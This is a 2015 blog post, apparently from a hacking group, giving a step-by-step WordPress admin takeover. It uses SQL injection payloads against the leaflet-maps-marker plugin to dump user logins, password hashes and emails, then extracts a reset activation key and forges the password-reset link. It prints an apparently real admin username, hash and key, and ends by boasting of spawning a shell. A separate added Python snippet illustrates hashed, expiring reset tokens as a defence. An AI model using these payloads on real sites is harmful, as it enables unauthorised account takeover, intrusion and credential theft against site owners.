Wednesday, May 6, 2015

A new way to inject sites that use the WordPress script

This thread comes to you from Gaza Hacker Team [ GHT ] and [ GHI ].

Today I'll show you how to inject a WordPress site and get into the admin panel in seconds.

Let's say we have this vulnerable site:

PHP Code:
www.site.com/wp-content/plugins/leaflet-maps-marker/leaflet-fullscreen.php?marker=1 
And let's say we extracted the column number and the admin data [ user and password ] by SQLi:


PHP Code:

www.site.com/wp-content/plugins/leaflet-maps-marker/leaflet-fullscreen.php?marker=-1 Union Select 1,(select(@) from (select (@:=0x00),(select (@) from (wp_userswhere (@) in (@:=concat(@,0x0a,user_login,0x3a,user_pass,0x3a,user_email))))a),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 --  

admin login : michelsenweb
admin password : $P$BPXdeAk4qo6ndqQWUJfuRkMOCqi.bJ0

This password is difficult to crack.

OK, now I will show you an easy way to log in to the admin panel.

First we go to the admin login page and press "Lost your password?"



PHP Code:

www.site.com/wp-login.php 

Now we enter the admin user we found by injection: michelsenweb.

We don't have access to the admin's mail to receive the link for creating a new password or to get the activation key.

OK, see what I will do!

Now we will extract the user_activation_key by injection, which we will use to create a new password:


PHP Code:

www.site.com/wp-content/plugins/leaflet-maps-marker/leaflet-fullscreen.php?marker=-1 UNION SELECT 1,2,3,4,5,group_concat(user_login,0x3a,user_activation_key),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 FROM wp_users










Now we have the user_activation_key for this admin user, michelsenweb:

michelsenweb:ADpMtuhLWYbPSubvKwgx

Now we will use this query to create a new password:

PHP Code:

www.site.com/wp-login.php?action=rp&key=user_activation_key&login=user_login 

replace : user_activation_key by ADpMtuhLWYbPSubvKwgx
replace : user_login by michelsenweb

like this:

PHP Code:
www.site.com/wp-login.php?action=rp&key=ADpMtuhLWYbPSubvKwgx&login=michelsenweb 
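
The reset link above is accepted because the value read out of `user_activation_key` is the same value that `wp-login.php` expects as `key`. The following is an added example, not part of the original post and not WordPress's own code, of a reset-token store that keeps only a hash and an expiry in the database, so a value read from the table cannot be presented as the key; the class name, lifetime, user names and clock values are assumptions.

```python
import hashlib
import hmac
import secrets
import time

RESET_TTL_SECONDS = 3600  # assumed lifetime of a reset link


class ResetTokenStore:
    """Hypothetical store: a row holds a hash and an expiry, never the key itself."""

    def __init__(self):
        self.rows = {}  # user_login -> (sha256 hex digest of key, expiry timestamp)

    def issue(self, user_login, now=None):
        """Create a key, persist only its hash, return the key for the e-mail link."""
        now = time.time() if now is None else now
        key = secrets.token_urlsafe(32)  # high entropy, so an unsalted hash suffices
        digest = hashlib.sha256(key.encode()).hexdigest()
        self.rows[user_login] = (digest, now + RESET_TTL_SECONDS)
        return key

    def redeem(self, user_login, presented_key, now=None):
        """Accept a key once, only if it hashes to the stored value and is unexpired."""
        now = time.time() if now is None else now
        row = self.rows.get(user_login)
        if row is None:
            return False
        digest, expires = row
        presented = hashlib.sha256(presented_key.encode()).hexdigest()
        if now > expires or not hmac.compare_digest(presented, digest):
            return False
        del self.rows[user_login]  # single use: a replayed link fails
        return True


def demo():
    store = ResetTokenStore()
    alice_key = store.issue("alice", now=1000.0)  # constructed users and clock
    bob_key = store.issue("bob", now=1000.0)
    stored_value, _ = store.rows["alice"]  # what a read of the table reveals
    return {
        "db_value_accepted": store.redeem("alice", stored_value, now=1001.0),
        "emailed_key_accepted": store.redeem("alice", alice_key, now=1002.0),
        "replay_accepted": store.redeem("alice", alice_key, now=1003.0),
        "expired_key_accepted": store.redeem("bob", bob_key, now=1000.0 + RESET_TTL_SECONDS + 1),
    }
```
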

Now we get the page for creating a new password. After entering the new password, press Reset Password.

OK, let's try to log in to the admin panel with our new password.

Aha, we are now in the admin panel, and now we can spawn a shell.

Hope you learned something.

Author :: 
Gaza Hacker Team
